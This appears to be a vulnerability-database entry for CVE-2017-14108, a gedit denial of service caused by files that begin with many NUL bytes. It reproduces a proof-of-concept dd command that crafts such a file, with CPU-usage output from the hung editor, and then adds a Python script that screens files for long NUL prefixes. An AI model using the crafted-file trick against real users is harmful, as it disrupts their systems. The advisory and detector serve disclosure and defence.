GNOME gedit security vulnerability

Vulnerability ID: 1134535
Vulnerability type: Resource management error
Published: 2017-09-02
Updated: 2019-10-23
CVE ID: CVE-2017-14108
CNNVD ID: CNNVD-201709-018
Platform: N/A
CVSS score: 7.1
|Vulnerability source
https://cxsecurity.com/issue/WLB-2017090008
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201709-018
|Vulnerability details
GNOME gedit is the text editor of the GNOME project. The libgedit.a file in GNOME gedit 3.22.1 and earlier contains a security vulnerability. A remote attacker can exploit it to cause a denial of service (CPU consumption) via a file that begins with many '\0' (NUL) characters.
|Exploit (PoC)
################
#Title: libgedit.a mishandling NUL Blocks in gedit(GNOME text editor)  
#CWE: CWE-400
#CVE: CVE-2017-14108
#Exploit Author: Hosein Askari 
#Vendor HomePage: https://gnome.org , https://wiki.gnome.org/Apps/Gedit
#Version : All Version (3.22.1 and older version)
#Tested on: Ubuntu 16.04 (Linux 4.4.0-93-generic)
#Date: 01-09-2017
#Category: Application
#Author Mail : hosein.askari@aol.com
#Description: libgedit.a in GNOME gedit through 3.22.1 allows remote attackers to cause a denial of service (CPU consumption) via a file that begins with many '\0' characters.
###############
sudo echo -ne '\x68\x6f\x73\x65\x69\x6e\x20\x61\x73\x6b\x61\x72\x69' | dd conv=notrunc bs=1000 seek=100 of=craft.txt
################
POC:
constantine@constantine:~$ pidstat -h -r -u -v -p 3107
Linux 4.4.0-93-generic (constantine) 	۱۷/۰۹/۰۱ 	_i686_	(2 CPU)

#      Time   UID       PID    %usr %system  %guest   %wait    %CPU   CPU  minflt/s  majflt/s     VSZ     RSS   %MEM threads   fd-nr  Command
 1504280041  1000      3107   16.43    0.01    0.00    0.03   106.44     1     15.53      0.00  121296   38804   0.95       4      18  gedit

constantine@constantine:~$ top
  PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND                                                                                              
 3107 constan+  20   0  128884  38492  28320 R 106.7  0.9   0:17.76 gedit 
################
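The trigger condition described above is a file whose content starts with a long run of NUL bytes (the `dd ... seek=100 bs=1000` command leaves 100,000 zero bytes before the 13-byte payload). A defender can screen files for exactly that prefix before they reach an editor. The following is an added example, not code from the page or from the gedit project; the `THRESHOLD` value of 1024 leading NULs is an assumed cutoff, and the `CRAFTED` and `NORMAL` sample contents are constructed here to mirror the PoC file and an ordinary text file.

```python
import os
import tempfile

CHUNK = 64 * 1024          # read size; lets the scan stop early on huge sparse files
THRESHOLD = 1024           # assumed cutoff: this many leading NULs is treated as suspect

# Constructed sample data (not from the page): the PoC's dd command writes a
# 13-byte payload at offset 100*1000, so the file starts with 100 000 NUL bytes.
# NORMAL is an ordinary text file for comparison.
CRAFTED = b"\x00" * 100_000 + b"hosein askari"
NORMAL = b"hello, world\n"


def leading_nul_count(data: bytes) -> int:
    """Number of consecutive NUL bytes at the start of `data`."""
    return len(data) - len(data.lstrip(b"\x00"))


def leading_nul_count_file(path: str) -> int:
    """Same check streamed from disk: reads chunk by chunk and stops at the
    first non-NUL byte, so a multi-gigabyte sparse file costs little I/O."""
    total = 0
    with open(path, "rb") as fh:
        while True:
            chunk = fh.read(CHUNK)
            if not chunk:          # EOF: file is empty or entirely NUL
                return total
            n = leading_nul_count(chunk)
            total += n
            if n < len(chunk):     # hit a non-NUL byte inside this chunk
                return total


def check_file(path: str, threshold: int = THRESHOLD) -> dict:
    """Classify a file before handing it to an editor: report the NUL-prefix
    length and whether it reaches the threshold."""
    n = leading_nul_count_file(path)
    return {"path": path, "leading_nuls": n, "suspect": n >= threshold}


def demo() -> dict:
    """Write both constructed samples to a temp dir, run the check on each,
    and return the verdicts keyed by sample name."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        for name, data in (("crafted", CRAFTED), ("normal", NORMAL)):
            path = os.path.join(tmp, name + ".txt")
            with open(path, "wb") as fh:
                fh.write(data)
            results[name] = check_file(path)
    return results


if __name__ == "__main__":
    for name, r in demo().items():
        print(f"{name}: leading NULs={r['leading_nuls']}, suspect={r['suspect']}")
```

The streamed variant matters because the PoC file is sparse: `dd seek=` produces a file whose apparent size is far larger than its on-disk footprint, and reading it whole into memory would itself be wasteful. Stopping at the first non-NUL byte keeps the check cheap on both the crafted file and on ordinary text, which returns after the first chunk.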
|References

Source: MISC
Link: https://cxsecurity.com/issue/WLB-2017090008
Source: MISC
Link: https://packetstormsecurity.com/files/143983/libgedit.a-3.22.1-Denial-Of-Service.html